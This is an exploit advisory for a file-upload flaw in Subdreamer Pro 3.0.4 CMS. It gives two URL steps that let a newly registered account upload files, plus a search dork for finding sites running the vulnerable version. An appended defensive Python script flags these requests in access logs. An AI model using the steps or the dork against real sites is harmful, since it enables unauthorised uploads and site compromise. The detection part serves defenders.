Subdreamer Pro 3.0.4 - CMS Upload

EDB-ID: 14101
CVE: N/A
Platform: Multiple
Date: 2010-06-28



__________         __    __                              .__ 
\______   \_____ _/  |__/  |_  ____  __ __  ___________  |__|
 |    |  _/\__  \\   __\   __\/  _ \|  |  \/  ___/\__  \ |  |
 |    |   \ / __ \|  |  |  | (  <_> )  |  /\___ \  / __ \|  |
 |______  /(____  /__|  |__|  \____/|____//____  >(____  /__|
        \/      \/                             \/      \/   

######################################################
# Exploit Title: Subdreamer Pro v3.0.4 CMS upload Vulnerability
# Author: Battousai
# Home: http://hack.pro.mk & https://ssteam.ws
# Software Link: N/A
# Version: v3.0.4
# Tested on: Windows XP SP3, Linux Ubuntu 10.04
# CVE : N/A
# Dork: "Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media"
######################################################


Exploit:

1. Register your account at: http://127.0.0.1/index.php?categoryid=4

2. After registering, point your browser at: http://127.0.0.1/index.php?categoryid=2&p17_sectionid=2&p17_action=submitimage (and upload is complete)



######################################################
# Greetz to: SilenceD, Zer0Flag, Evilb4st4rd, internet
# KingPin, s3th, packetdeath, Horadrim, AnnexxEmpire
# sM10, 599eme Man, Xylitol, __KiNG, 777, sp1r1t
# d3v1l, AlphaDog, n3d
# and every living person at:
# http://hack.pro.mk & https://ssteam.ws
######################################################
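
For sites still running this version, the two requests in the steps above can be looked for in web server access logs. The Python below is an added example, not part of the original advisory: it lists every request to the `submitimage` action and marks those that follow a registration-page hit from the same client. It assumes the Apache/nginx combined log format, the parameter values shown in the advisory's URLs, and a one-hour correlation window; the sample log lines are constructed.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Assumption: Apache/nginx "combined" access-log format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
WINDOW = timedelta(hours=1)  # assumed correlation window, tune per site
# Constructed sample lines, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Jun/2010:10:00:01 +0000] "POST /index.php?categoryid=4 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Jun/2010:10:02:30 +0000] "POST /index.php?categoryid=2&p17_sectionid=2&p17_action=submitimage HTTP/1.1" 200 734 "-" "Mozilla/5.0"
198.51.100.9 - - [28/Jun/2010:11:00:00 +0000] "GET /index.php?categoryid=2 HTTP/1.1" 200 901 "-" "Mozilla/5.0"
198.51.100.20 - - [28/Jun/2010:12:00:00 +0000] "POST /index.php?categoryid=2&p17_sectionid=2&p17_action=submitimage HTTP/1.1" 200 734 "-" "Mozilla/5.0"
"""

def classify(target):
    """Map a request target to 'register', 'submitimage' or None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/index.php"):
        return None
    query = parse_qs(parts.query)
    if query.get("p17_action") == ["submitimage"]:
        return "submitimage"
    if query.get("categoryid") == ["4"]:  # registration page in the advisory
        return "register"
    return None

def find_upload_events(log_text, window=WINDOW):
    """Return submitimage requests; new_account is True when the same client
    requested the registration page no more than `window` earlier."""
    last_register, events = {}, []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        kind = classify(m["target"]) if m else None
        if kind is None:
            continue  # unparsable line or unrelated request
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if kind == "register":
            last_register[m["ip"]] = ts
            continue
        seen = last_register.get(m["ip"])
        fresh = seen is not None and ts - seen <= window
        events.append({"ip": m["ip"], "time": ts, "status": int(m["status"]),
                       "method": m["method"], "new_account": fresh})
    return events

if __name__ == "__main__":
    for event in find_upload_events(SAMPLE_LOG):
        print(event)
```

Events with `new_account` set are the ones to review first, together with whatever files were written to the site's upload location around the logged time.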